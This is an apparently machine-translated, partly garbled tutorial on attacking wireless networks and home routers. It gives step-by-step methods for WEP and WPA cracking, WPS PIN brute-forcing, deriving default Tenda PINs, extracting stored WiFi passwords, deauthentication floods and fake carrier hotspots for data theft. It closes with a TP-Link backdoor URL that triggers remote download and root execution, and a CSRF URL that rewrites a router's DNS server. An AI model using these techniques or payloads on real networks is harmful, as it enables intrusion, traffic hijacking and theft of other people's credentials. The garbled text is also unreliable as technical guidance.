Detailed Wireless Application security comprehensive analysis "graphic tutorial"

WiFi cracking mode

WEP cracked

If your home router's wireless encryption is configured for WEP encryption, then you have to change it right away because the WEP encryption system is flawed, and the net-rubbing can be used to restore the password by collecting enough handshake packets (that is, the packet in the authentication process between the computer and the wireless router). The attack success rate of this kind of encryption method is nearly 100%. The more common attack tactic is to use MIDIWEP to sniff around the wireless signals, and when you crawl to enough IVs, you can automatically solve the wireless password, as shown in the following figure:

WPA/WPA2 Blasting

Wireless router is another encryption method for WPA/WPA2 encryption, compared to WEP encryption, temporarily failed to find a way to directly crack the WPA/WPA2 password from some public methods, can only capture the handshake package, and then the handshake package for brute force, But the combination of some skills and the common user password strategy is weak, the probability of success is also relatively high.

Shake hands to run a dictionary, this is mainly to see your dictionary to give no power, the time to spell the character of the same, and crack WEP operation, select the signal point Lanch began to grasp the bag, grab the bag when the router is must have the user to use, the purpose is to attack the other side off the line, in the process of automatic connection to crawl WPA certified four times Handshake package. If you have not found the online client, you can not grasp the package, only to wait for someone to use the time to try again.

Pop-up below this tip, that the bag was successful, the package is copied out with EWSA to verify the full handshake package, to include a complete four times handshake information can be used to crack.

Only the prompt is a valid packet can be used for dictionary cracking, such as the following packet is available.

Next please come out Hashcat artifact or EWSA to run the dictionary directly, (because my Computer configuration is not very high often I choose is) directly throw Taobao let professionals to run

Pin Brute-lift attack (WPS crack)

Most wireless routers have a WPS fast connection function, as long as the connection of the correct input router PIN management code, you can automatically according to the algorithm to negotiate the key to connect WiFi. This pin is a 8-digit pure number, the first 4 digits and the latter 4 are validated separately, the 8th bit is the inspection code (according to the first 7 bits according to a certain algorithm can be launched 8th). That is to say, if you want to raise this pin, you only need to 10^4+10^3=11000 the time, Reaver is the tool to do this job. As long as the router has the WPS function turned on and there is no mechanism to lock the WPS, it is possible to try out the correct PIN code and get a PIN to get the WPA password. And most of the cases, the Router factory open wps function OH:). However, to explain that some routers, try the wrong pin many times will be locked, in this case can only use the first bag to run the password.

Click Scan appears router Mac name and other information with WPS support PIN code cracked, scanned out with WPS router, click Reaver to carry out pin-lift attack. The following figure

Pin code is now cracked

To connect

Enter the cracked PIN code in the box. Click Next, the software will automatically find routes, automatic connection

Tengda Wireless Router PIN Code vulnerability

Tengda Wireless Router MAC address with "C83a35" or "00b00c" the default PIN, you can calculate

The calculator to the programmer type, select 16, such as 08:10:76:0f:b3:5c this MAC address, take the six digits, after the input after the selection of decimal even after the first 7 pin, the 8th program will complete their own completion.

The calculation is the route of the first 7 digits of the PIN, the PIN is composed of 8 digits, the first 7 has come out, the last one guess it out, guess the direct link route.

App causes WiFi password leak

Get the WiFi password with the WiFi master key, provided it is already Root's Android phone. WiFi Universal key from the server to get someone else to share the password to connect WiFi, disconnect after the password cleared. The point is, WiFi is in the process of connecting the password is stored in the local/data/misc/wifi/wpa_ On the supplicant.conf, we can forcibly terminate the WiFi master key process, the password is permanently preserved, this time with a file manager such as re or ES browser, open the/data/misc/wifi/wpa_ Supplicant.conf will be able to see the password.

Or install a app bar, search the WiFi Connection Manager, long press the display password on the line, all need root permissions.

WiFi attack

Man-in-the-Middle attack

The so-called man-in-the-middle attack is the target host and another host in the process of normal connection, the attacker by intercepting, inserting, forging, interrupt packets and other means to obtain the other landing account and password, forged identity and so on.

ARP attack on the handset side

After connecting to the network, the list of devices scanned using Dsploit is exactly the same as in the Router management interface:

Springboard attack

Software based wireless Springboard attack

The software based wireless Springboard attack refers to the link of the wireless network, which is connected with the host and the notebook as the transmission node in the wired network, and transmits the wireless signal to the wired network.

Hardware based Wireless Springboard attack

Use the host, wireless router or wireless AP as the transmission node, and connected to the wireless signal transmission, which is often said wireless relay.

By relaying multiple wireless APs, the original internal wireless network signal is transmitted.

DHCP attack

Attacks launched using DHCP vulnerabilities can quickly deplete IP address pools, resulting in a large area of business paralysis, and difficult to track, and extremely harmful.

A large amount of IP is occupied

DDoS attacks

Verifying flood attacks

Like traditional wired networks, wireless routers also face the threat of wireless Dos attacks

We use MDK3 to test the validation of flood attacks.

We can see that MDK3 forged a large number of false clients to connect Chinanet,ma addresses are also randomly forged.

Canceling validation of flood attacks

Client establishes a connection to the AP

Insert a forged cancellation message via broadcast

The client considers the message to be from the AP

Connected clients disconnect on their own

This attack is not directed at the AP, but for the client, and when we launch the attack we can immediately see that we are unable to access the network and the results are very quick. At this point we can use the-s parameter to speed up the contract rate. This efficiency is very high, generally started, the client began to break the net.

WiFi Fishing

Passive attack

Set up a fake WiFi hotspot, wait for someone else's connection, install tcpdump and other tools to grab the packets and steal the data.

Active attack

Use the smart phone Wi-Fi broadcast protocol flaw/automatic access design to attack.

The mobile phone is kept on the phone after it is connected to WiFi hotspot information and is automatically accessed each time it enters the wireless coverage area.

Open WiFi hotspots

China Mobile hot spots: CMCC, cmcc-edu, etc.

China Unicom hotspot: chinaunicom

China Telecom hotspot: ChinaNet, chinatelecom, etc.

To speed up the connection, the wireless device broadcasts what wireless it has connected to, and how much the SSID is. If I intercept this broadcast, I'll naturally know what wireless you've been able to fake.

Set up the same SSID cut no password AP hotspot, mobile phone will be connected to the mobile phone has been connected to the AP hotspot, the connection is only to verify the SSID is the same, when there is no password, do not have to verify, will actively connect. (This should be the Android 4.2 version available).

Domestic mobile phone with the WLAN services (deleted are not deleted)

The operator's Wi-Fi hotspot built into your phone, and some of the phone in some of these Wi-Fi you can not delete, encountered on the link, such a situation, we arbitrarily set up a similar to CMCC and other hot spots can be information theft.

Equipment attack and defense

Tp-link Back Door

Some of the Tp-link routers have a backdoor feature that automatically downloads and executes the program from an attacker-controlled TFTP server by accessing a specific page that is not authorized for authentication. An attacker could exploit this vulnerability to execute arbitrary commands as root on the router, thereby fully controlling the router.

Http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html ", the router downloads a nart.out file from the requesting machine via TFTP and executes the file with root permissions.

CSRF attack

IE does not support HTTP authentication using this method under IE the attack is not valid for perfect compatibility with FF Chrome.

http://admin:admin@192.168.1.1/userrpm/landhcpserverrpm.htm?dhcpserver=1&ip1= 192.168.1.100&ip2= 192.168.1.199&lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5& Dnsserver2=8.8.8.8&save=%25b1%25a3+%25b4%25e6

Beacon Communication A router has been exploded vulnerabilities-can remotely modify DNS

Http://www.exploit-db.com/exploits/28450/

What can a router breach do?

Network export flow control in your hand, mobile phone to use the update system to hang a horse? PC end using IE and other loopholes to hang the horse? Steal login password and so on.

The

Control router equals the control of more than 80% of the traffic packets, using the same way as sniffing and hijacking the LAN.